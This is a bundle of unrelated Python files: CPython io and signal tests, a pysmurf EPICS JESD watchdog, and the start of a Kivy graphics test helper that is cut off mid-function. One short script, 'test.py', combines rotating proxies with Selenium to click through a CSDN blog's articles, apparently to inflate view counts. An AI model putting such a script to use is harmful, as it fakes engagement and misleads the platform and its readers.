self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(os_helper.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(os_helper.TESTFN, "wb")
self._check_warn_on_dealloc(os_helper.TESTFN, "w", encoding="utf-8")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with warnings_helper.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r", encoding="utf-8")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
if "b" not in kwargs["mode"]:
kwargs["encoding"] = "utf-8"
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(os_helper.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
        # 'x' mode fails if the file already exists
with self.open(os_helper.TESTFN, 'w', encoding="utf-8"):
pass
self.assertRaises(FileExistsError, self.open, os_helper.TESTFN, 'x', encoding="utf-8")
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(os_helper.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(os_helper.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'rwax+', encoding="utf-8")
def test_check_encoding_errors(self):
# bpo-37388: open() and TextIOWrapper must check encoding and errors
# arguments in dev mode
mod = self.io.__name__
filename = __file__
invalid = 'Boom, Shaka Laka, Boom!'
code = textwrap.dedent(f'''
import sys
from {mod} import open, TextIOWrapper
try:
open({filename!r}, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(21)
try:
open({filename!r}, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(22)
fp = open({filename!r}, "rb")
with fp:
try:
TextIOWrapper(fp, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(23)
try:
TextIOWrapper(fp, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(24)
sys.exit(10)
''')
proc = assert_python_failure('-X', 'dev', '-c', code)
self.assertEqual(proc.rc, 10, proc)
def test_check_encoding_warning(self):
# PEP 597: Raise warning when encoding is not specified
# and sys.flags.warn_default_encoding is set.
mod = self.io.__name__
filename = __file__
code = textwrap.dedent(f'''\
import sys
from {mod} import open, TextIOWrapper
import pathlib
with open({filename!r}) as f: # line 5
pass
pathlib.Path({filename!r}).read_text() # line 8
''')
proc = assert_python_ok('-X', 'warn_default_encoding', '-c', code)
warnings = proc.err.splitlines()
self.assertEqual(len(warnings), 2)
self.assertTrue(
warnings[0].startswith(b"<string>:5: EncodingWarning: "))
self.assertTrue(
warnings[1].startswith(b"<string>:8: EncodingWarning: "))
def test_text_encoding(self):
# PEP 597, bpo-47000. io.text_encoding() returns "locale" or "utf-8"
# based on sys.flags.utf8_mode
code = "import io; print(io.text_encoding(None))"
proc = assert_python_ok('-X', 'utf8=0', '-c', code)
self.assertEqual(b"locale", proc.out.strip())
proc = assert_python_ok('-X', 'utf8=1', '-c', code)
self.assertEqual(b"utf-8", proc.out.strip())
@support.cpython_only
    # Depending on whether OpenWrapper was already created or not, the warning
    # is emitted or not. For example, the attribute is already created when
    # this test is run multiple times.
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_openwrapper(self):
self.assertIs(self.io.OpenWrapper, self.io.open)
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: _enter_buffered_busy: "
r"could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
@threading_helper.requires_working_threading()
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
@threading_helper.requires_working_threading()
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
# XXX This test has three flaws that appear when objects are
# XXX not reference counted.
# - if wio.write() happens to trigger a garbage collection,
# the signal exception may be raised when some __del__
# method is running; it will not reach the assertRaises()
# call.
# - more subtle, if the wio object is not destroyed at once
# and survives this function, the next opened file is likely
# to have the same fileno (since the file descriptor was
# actively closed). When wio.__del__ is finally called, it
# will close the other's test file... To trigger this with
# CPython, try adding "global wio" in this function.
# - This happens only for streams created by the _pyio module,
        # because a wio.close() that fails still considers that the
# file needs to be closed again. You can try adding an
# "assert wio.closed" at the end of the function.
# Fortunately, a little gc.collect() seems to be enough to
# work around all these issues.
support.gc_collect() # For PyPy or other GCs.
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@requires_alarm
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
@requires_alarm
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
@requires_alarm
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
@requires_alarm
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
@requires_alarm
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
@requires_alarm
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
@requires_alarm
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r", encoding="latin1")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = import_helper.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@requires_alarm
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
@requires_alarm
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(loader, tests, pattern):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = loader.suiteClass()
for test in tests:
suite.addTest(loader.loadTestsFromTestCase(test))
return suite
if __name__ == "__main__":
unittest.main()
|
test.py
|
import requests
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from threading import Thread
from multiprocessing import Process
import time
def click_href(url, browser):
    # WebElement.click() returns None on success and raises on failure, so use
    # exception handling instead of checking its return value.
    try:
        browser.click()
        print(url + ' ok')
    except Exception:
        print(url + ' error...')
def get_proxy_url():
    proxyAPI_url = 'http://api3.xiguadaili.com/ip/?tid=559488590020119&num=1&delay=1&protocol=https&filter=on'
#
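    # NOTE: the proxy API is assumed to return a bare "ip:port" string in the
    # response body on success (assumption based on how r.text is used below).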
r = requests.get(proxyAPI_url)
if r.status_code != 200:
return
else:
        proxy = f'https://{r.text}/'
return proxy
def chrome_url():
    # Get a proxy from the API
proxy = get_proxy_url()
options = Options()
# options.add_argument('--headless')
options.add_argument('--proxy-server=' + proxy)
print('--proxy-server=' + proxy)
browser = webdriver.Chrome(options=options,)
browser.get('https://blog.csdn.net/littleRpl?spm=1001.2101.3001.5113')
elements_list = browser.find_elements_by_class_name('article-item-box')
t_list = []
for element in elements_list:
sub_elem = element.find_element_by_tag_name('a')
href = sub_elem.get_attribute('href')
# click_href(href, sub_elem)
t = Thread(target=click_href, args=[href, sub_elem])
t.start()
t_list.append(t)
[tt.join() for tt in t_list]
chrome_url()
# if __name__ == '__main__':
#
# p_list = []
# for i in range(10):
# p = Process(target=chrome_url)
# p.start()
# p_list.append(p)
#
# [pp.join() for pp in p_list]
|
JesdWatchdog.py
|
#!/usr/bin/env python
#-----------------------------------------------------------------------------
# Title : pysmurf watchdog module - JesdWatchdog class
#-----------------------------------------------------------------------------
# File : pysmurf/watchdog/JesdWatchdog.py
# Created : 2018-12-06
#-----------------------------------------------------------------------------
# This file is part of the pysmurf software package. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the pysmurf software package, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import logging
import sys
import time
from datetime import datetime
import epics
class JesdWatchdog(object):
def __init__(self, prefix):
self.logfile = '/tmp/JesdWatchdog.log'
logging.basicConfig(filename=self.logfile,level=logging.ERROR)
self.prefix = prefix
self.enabledPv = epics.get_pv('SIOC:SMRF:ML00:AO001', callback=self.enableChanged, auto_monitor=True)
self.enable = self.enabledPv.get()
self.jesdtxreset_thread = None
self.jesdrxreset_thread = None
self.counterPv = epics.get_pv('SIOC:SMRF:ML00:AO001CNT')
self.counterPvProc = epics.get_pv('SIOC:SMRF:ML00:AO001CNT.PROC')
self.JesdRxValidPv = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppTopJesd[0]:JesdRx:DataValid', callback=self.jesdValidChanged, auto_monitor=True)
self.JesdTxValidPv = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppTopJesd[0]:JesdTx:DataValid', callback=self.jesdValidChanged, auto_monitor=True)
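        # Monitor the JESD RX/TX DataValid registers: jesdValidChanged() kicks
        # off a recovery thread whenever either one drops to 0 while enabled.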
def enableChanged(self, pvname, value, *args, **kwargs):
print("Enable changed to " + str(value))
self.enable = value
@staticmethod
def jesdRXReset(prefix):
logging.error(f'[{datetime.now()}] ' +
' JesdRx went down, will attempt to recover...')
# for recovery
PwrUpSysRef = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppCore:MicrowaveMuxCore[0]:LMK:PwrUpSysRef')
JesdRxEnable = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppTopJesd[0]:JesdRx:Enable')
#1. Toggle JesdRx:Enable 0x3F3 -> 0x0 -> 0x3F3
JesdRxEnable.put(0x0)
JesdRxEnable.put(0x3F3)
# SYSREF is the last step
PwrUpSysRef.put(1)
@staticmethod
def jesdTXReset(prefix):
logging.error(f'[{datetime.now()}] ' +
' JesdTx went down, will attempt to recover...')
# for recovery
PwrUpSysRef = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppCore:MicrowaveMuxCore[0]:LMK:PwrUpSysRef')
JesdTxEnable = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppTopJesd[0]:JesdTx:Enable')
DAC0JesdRstN = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppCore:MicrowaveMuxCore[0]:DAC[0]:JesdRstN')
DAC1JesdRstN = epics.get_pv(prefix + ':AMCc:FpgaTopLevel:AppTop:AppCore:MicrowaveMuxCore[0]:DAC[1]:JesdRstN')
#1. Toggle JesdRx:Enable 0x3CF -> 0x0 -> 0x3CF
JesdTxEnable.put(0x0)
JesdTxEnable.put(0x3CF)
#2. Toggle AMCcc:FpgaTopLevel:AppTop:AppCore:MicrowaveMuxCore[0]:DAC[0]:JesdRstN 0x1 -> 0x0 -> 0x1
DAC0JesdRstN.put(0x0)
DAC0JesdRstN.put(0x1)
#3. Toggle AMCcc:FpgaTopLevel:AppTop:AppCore:MicrowaveMuxCore[0]:DAC[1]:JesdRstN 0x1 -> 0x0 -> 0x1
DAC1JesdRstN.put(0x0)
DAC1JesdRstN.put(0x1)
# SYSREF is the last step
PwrUpSysRef.put(1)
def jesdValidChanged(self, pvname, value, *args, **kwargs):
#print('[%s] ' % str(datetime.now()) + pvname + ' changed ; value=%s'%(str(value)))
if self.enable == 1:
if value == 0:
# JesdRx
if 'JesdRx' in pvname:
self.jesdrxreset_thread = epics.ca.CAThread(target=self.jesdRXReset, args=(self.prefix,))
self.jesdrxreset_thread.start()
# JesdTx
if 'JesdTx' in pvname:
self.jesdtxreset_thread = epics.ca.CAThread(target=self.jesdTXReset, args=(self.prefix,))
self.jesdtxreset_thread.start()
def run(self):
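        # Sample the heartbeat counter twice, five seconds apart; if it changed,
        # another process is already driving it and this watchdog backs off.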
count = self.counterPv.get()
time.sleep(5)
count1 = self.counterPv.get()
if count != count1:
            logging.error('Another process is incrementing the counter')
return
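        # Heartbeat loop: poke the counter record's .PROC field once per second
        # so the counter keeps updating while this watchdog is alive.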
while True:
time.sleep(1)
self.counterPvProc.put(1)
return
if __name__ == '__main__':
prefix = 'test_epics'
if len(sys.argv) > 1:
prefix = sys.argv[1]
wd = JesdWatchdog(prefix)
wd.run()
|
common.py
|
'''
This is an extended unittest module for Kivy, to make unittests based on
graphics with an OpenGL context.
The idea is to render a Widget tree, and after 1, 2 or more frames, a
screenshot will be made and compared to the reference one.
If no screenshot exists for the current test, the very first one will be used.
The screenshots live in the 'kivy/tests/results' folder and are in PNG format,
320x240 pixels.
'''
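# A minimal usage sketch (illustrative only, not part of the original module;
# ``Button`` is just an example widget):
#
#     class ButtonGraphicTestCase(GraphicUnitTest):
#         def test_button_renders(self):
#             from kivy.uix.button import Button
#             self.render(Button(text='hello'), framecount=2)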
__all__ = (
'GraphicUnitTest', 'UnitTestTouch', 'UTMotionEvent', 'async_run',
'requires_graphics')
import unittest
import logging
import pytest
import sys
from functools import partial
import os
import threading
from kivy.graphics.cgl import cgl_get_backend_name
from kivy.input.motionevent import MotionEvent
log = logging.getLogger('unittest')
_base = object
if 'mock' != cgl_get_backend_name():
# check what the gl backend might be, we can't know for sure
# what it'll be until actually initialized by the window.
_base = unittest.TestCase
make_screenshots = os.environ.get('KIVY_UNITTEST_SCREENSHOTS')
http_server = None
http_server_ready = threading.Event()
kivy_eventloop = os.environ.get('KIVY_EVENTLOOP', 'asyncio')
def requires_graphics(func):
if 'mock' == cgl_get_backend_name():
return pytest.mark.skip(
reason='Skipping because gl backend is set to mock')(func)
return func
def ensure_web_server(root=None):
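    # Start (at most once) a background HTTP server on port 8000 serving *root*,
    # so tests that need to fetch files over HTTP have a local endpoint; blocks
    # until the server thread signals that it is ready.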
if http_server is not None:
return True
if not root:
root = os.path.join(os.path.dirname(__file__), "..", "..")
need_chdir = sys.version_info.major == 3 and sys.version_info.minor <= 6
curr_dir = os.getcwd()
def _start_web_server():
global http_server
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
try:
if need_chdir:
os.chdir(root)
handler = SimpleHTTPRequestHandler
else:
handler = partial(SimpleHTTPRequestHandler, directory=root)
http_server = TCPServer(
("", 8000), handler, bind_and_activate=False)
http_server.daemon_threads = True
http_server.allow_reuse_address = True
http_server.server_bind()
http_server.server_activate()
http_server_ready.set()
http_server.serve_forever()
except:
import traceback
traceback.print_exc()
finally:
http_server = None
http_server_ready.set()
if need_chdir:
os.chdir(curr_dir)
th = threading.Thread(target=_start_web_server)
th.daemon = True
th.start()
http_server_ready.wait()
if http_server is None:
raise Exception("Unable to start webserver")
class GraphicUnitTest(_base):
framecount = 0
def _force_refresh(self, *largs):
        # this prevents getting stuck in some cases when the screen doesn't
        # refresh and we wait for a self.framecount that never goes down
from kivy.base import EventLoop
win = EventLoop.window
if win and win.canvas:
win.canvas.ask_update()
def render(self, root, framecount=1):
'''Call rendering process using the `root` widget.
The screenshot will be done in `framecount` frames.
'''
from kivy.base import runTouchApp
from kivy.clock import Clock
self.framecount = framecount
try:
Clock.schedule_interval(self._force_refresh, 1)
runTouchApp(root)
finally:
Clock.unschedule(self._force_refresh)
# reset for the next test, but nobody will know if it will be used :/
if self.test_counter != 0:
self.tearDown(fake=True)
self.setUp()
def run(self, *args, **kwargs):
        '''Extend the run of unittest, to check whether the results directory
        has been found. If no results directory exists, the test will be ignored.
'''
from os.path import join, dirname, exists
results_dir = join(dirname(__file__), 'results')
if make_screenshots and not exists(results_dir):
log.warning('No result directory found, cancel test.')
os.mkdir(results_dir)
self.test_counter = 0
self.results_dir = results_dir
self.test_failed = False
return super(GraphicUnitTest, self).run(*args, **kwargs)
def setUp(self):
'''Prepare the graphic test, with:
- Window size fixed to 320x240
- Default kivy configuration
- Without any kivy input
'''
# use default kivy configuration (don't load user file.)
from os import environ
environ['KIVY_USE_DEFAULTCONFIG'] = '1'
# force window size + remove all inputs
from kivy.config import Config
Config.set('graphics', 'width', '320')
Config.set('graphics', 'height', '240')
for items in Config.items('input'):
Config.remove_option('input', items[0])
# bind ourself for the later screenshot
from kivy.core.window import Window
self.Window = Window
Window.bind(on_flip=self.on_window_flip)
# ensure our window is correctly created
Window.create_window()
Window.register()
Window.initialized = True
Window.canvas.clear()
Window.close = lambda *s: True
def on_window_flip(self, window):
        '''Internal method called when the window has just displayed an image.
        Each time an image is shown, we decrement our framecount. When
        framecount reaches 0, we take the screenshot.
        The screenshot is saved in a temporary place and compared to the
        reference one -> test ok/ko.
If no screenshot is available in the results directory, a new one will
be created.
'''
from kivy.base import EventLoop
from tempfile import mkstemp
from os.path import join, exists
from os import unlink, close
from shutil import move, copy
# don't save screenshot until we have enough frames.
# log.debug('framecount %d' % self.framecount)
# ! check if there is 'framecount', otherwise just
# ! assume zero e.g. if handling runTouchApp manually
self.framecount = getattr(self, 'framecount', 0) - 1
if self.framecount > 0:
return
# don't create screenshots if not requested manually
if not make_screenshots:
EventLoop.stop()
return
reffn = None
match = False
try:
# just get a temporary name
fd, tmpfn = mkstemp(suffix='.png', prefix='kivyunit-')
close(fd)
unlink(tmpfn)
# get a filename for the current unit test
self.test_counter += 1
test_uid = '%s-%d.png' % (
'_'.join(self.id().split('.')[-2:]),
self.test_counter)
# capture the screen
log.info('Capturing screenshot for %s' % test_uid)
tmpfn = window.screenshot(tmpfn)
log.info('Capture saved at %s' % tmpfn)
# search the file to compare to
reffn = join(self.results_dir, test_uid)
log.info('Compare with %s' % reffn)
# get sourcecode
import inspect
frame = inspect.getouterframes(inspect.currentframe())[6]
sourcecodetab, line = inspect.getsourcelines(frame[0])
line = frame[2] - line
currentline = sourcecodetab[line]
sourcecodetab[line] = '<span style="color: red;">%s</span>' % (
currentline)
sourcecode = ''.join(sourcecodetab)
sourcecodetab[line] = '>>>>>>>>\n%s<<<<<<<<\n' % currentline
sourcecodeask = ''.join(sourcecodetab)
if not exists(reffn):
